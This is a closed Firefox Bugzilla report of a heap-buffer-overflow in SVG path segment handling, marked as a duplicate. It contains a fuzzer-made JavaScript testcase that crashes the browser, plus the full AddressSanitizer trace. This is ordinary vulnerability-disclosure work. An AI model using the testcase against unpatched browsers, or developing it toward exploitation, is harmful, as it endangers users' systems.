Closed
Bug 1430560
Opened 7 years ago
Closed 7 years ago
heap-buffer-overflow in mozilla::DOMSVGPathSeg::RemovingFromList
Categories
(Core :: SVG, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 1430557
| Tracking | Status | |
|---|---|---|
| firefox59 | --- | affected |
People
(Reporter: nils, Unassigned)
Details
(Keywords: csectype-bounds, reporter-external)
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=21ddfb9e6cc008e47da89db50e22697dc7b38635).
<script>
o399=document.createElementNS('http://www.w3.org/2000/svg','path');
o399.setAttribute('d', 'M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z');
o782=o399.createSVGPathSegLinetoVerticalRel(4);
o820=o399.animatedPathSegList;
o670=o399.createSVGPathSegLinetoVerticalAbs(15);
o1058=o399.pathSegList;
for(var x=0; x<47; x++) o820[x];
o1058.replaceItem(o782,35);
o1058.insertItemBefore(o670,28);
o1058.clear();
</script>
ASAN output:
=================================================================
==30545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800001fb90 at pc 0x0000004bdf99 bp 0x7ffcec556870 sp 0x7ffcec556020
READ of size 16 at 0x61800001fb90 thread T0 (file:// Content)
#0 0x4bdf98 in __asan_memcpy /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
#1 0x7fdae91fcdad in mozilla::DOMSVGPathSeg::RemovingFromList() /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSeg.cpp:114:3
#2 0x7fdae922bffb in mozilla::DOMSVGPathSegList::InternalListWillChangeTo(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:205:24
#3 0x7fdae922cca1 in mozilla::DOMSVGPathSegList::Clear(mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:289:19
#4 0x7fdae6c5d267 in mozilla::dom::SVGPathSegListBinding::clear(JSContext*, JS::Handle<JSObject*>, mozilla::DOMSVGPathSegList*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/SVGPathSegListBinding.cpp:61:9
#5 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
#6 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#7 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#8 0x7fdaee9e3d07 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2559:14
#9 0x233ad890252a (<unknown module>)
0x61800001fb90 is located 0 bytes to the right of 784-byte region [0x61800001f880,0x61800001fb90)
allocated by thread T0 (file:// Content) here:
#0 0x4bed33 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
#1 0x7fdae2b623c8 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:196:46
#2 0x7fdae2b623c8 in nsTArrayFallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayFallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayFallibleAllocator>(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
#3 0x7fdae718b2c7 in float* nsTArray_Impl<float, nsTArrayFallibleAllocator>::ReplaceElementsAt<float, nsTArrayFallibleAllocator>(unsigned long, unsigned long, float const*, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2025:47
#4 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator, nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1252:9
#5 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1261
#6 0x7fdae92c0c43 in mozilla::SVGPathData::CopyFrom(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/SVGPathData.cpp:37
#7 0x7fdae925d9ed in mozilla::SVGAnimatedPathSegList::SetBaseValueString(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/svg/SVGAnimatedPathSegList.cpp:57:27
#8 0x7fdae932b296 in nsSVGElement::ParseAttribute(int, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, nsAttrValue&) /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:422:20
#9 0x7fdae5b3755c in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2608:8
#10 0x7fdae5b36950 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:894:12
#11 0x7fdae5b36950 in mozilla::dom::Element::SetAttribute(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsIPrincipal*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/Element.cpp:1348
#12 0x7fdae777ac88 in mozilla::dom::ElementBinding::setAttribute(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:1167:9
#13 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
#14 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#15 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#16 0x7fdaee77dd56 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
#17 0x7fdaee77dd56 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
#18 0x7fdaee764700 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
#19 0x7fdaee795cc1 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:706:15
#20 0x7fdaee79645f in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:738:12
#21 0x7fdaef28f1e6 in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4712:12
#22 0x7fdae5e77846 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
#23 0x7fdae9c7caad in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2268:25
#24 0x7fdae9c76d39 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1911:10
#25 0x7fdae9c740a3 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1555:10
#26 0x7fdae9c589fe in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1293:10
#27 0x7fdae9c57b19 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:147:18
#28 0x7fdae4c9a84b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:246:18
#29 0x7fdae4c9a84b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
#30 0x7fdae4c93ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
#31 0x7fdae4ca013b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
#32 0x7fdae2bce710 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:395:25
#33 0x7fdae2bf670d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
#34 0x7fdae2c114e0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
#35 0x7fdae3a9c63a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#36 0x7fdae39f3f29 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#37 0x7fdae39f3f29 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#38 0x7fdae39f3f29 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c307fffbf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fffbf70: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffbf90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbfa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbfc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==30545==ABORTING
|
||
Comment 2•7 years ago
|
||
Jonathan, is this something you could investigate? Thanks.
|
||
Comment 3•7 years ago
|
||
This is the same underlying problem as bug 1430557. See bug 1430557 comment 3.
Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(jwatt)
Resolution: --- → DUPLICATE
|
|
||
Comment 4•7 years ago
|
||
For posterity, here's the the testcase from this bug with meaningful variable names:
<script>
path = document.createElementNS("http://www.w3.org/2000/svg", "path");
path.setAttribute("d", "M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z");
baseList = path.pathSegList;
animList = path.animatedPathSegList;
line1 = path.createSVGPathSegLinetoVerticalRel(4);
line2 = path.createSVGPathSegLinetoVerticalAbs(15);
for(var x=0; x<47; x++) {
animList[x];
}
baseList.replaceItem(line1, 35);
baseList.insertItemBefore(line2, 28);
baseList.clear();
</script>
|
||
Updated•7 years ago
|
Flags: sec-bounty?
|
|
||
Comment 5•7 years ago
|
||
Minusing for a bounty since it is the same underlying issue as bug 1430557.
Flags: sec-bounty? → sec-bounty-
|
||
Updated•4 years ago
|
Group: layout-core-security
|
||
Updated•9 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•